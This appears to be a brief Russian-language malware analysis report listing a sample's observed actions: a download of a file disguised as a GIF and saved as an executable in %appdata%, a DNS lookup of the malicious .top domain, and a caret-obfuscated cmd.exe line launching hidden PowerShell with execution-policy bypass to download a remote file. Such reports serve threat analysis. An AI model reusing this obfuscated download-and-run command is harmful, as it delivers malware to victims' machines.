Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^R^SHeLl.E^x^E^ -e^X^e^cUT^i^oN^pOliC^y^ ^By^P^as^s -NoPRo^FI^l^E^ ^-^wIN^D^OwstY^l^E ^HIdD^En (^NEW-^OBje^CT ^sys^TEM.NEt.W^e^b^Cl^ie^N^t^)^.dOwNLOa^D^FIl^E('http://w...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^R^SHeLl.E^x^E^ -e^X^e^cUT^i^oN^pOliC^y^ ^By^P^as^s -NoPRo^FI^l^E^ ^-^wIN^D^OwstY^l^E ^HIdD^En (^NEW-^OBje^CT ^sys^TEM.NEt.W^e^b^Cl^ie^N^t^)^.dOwNLOa^D^FIl^E('http://w...' (со скрытым окном)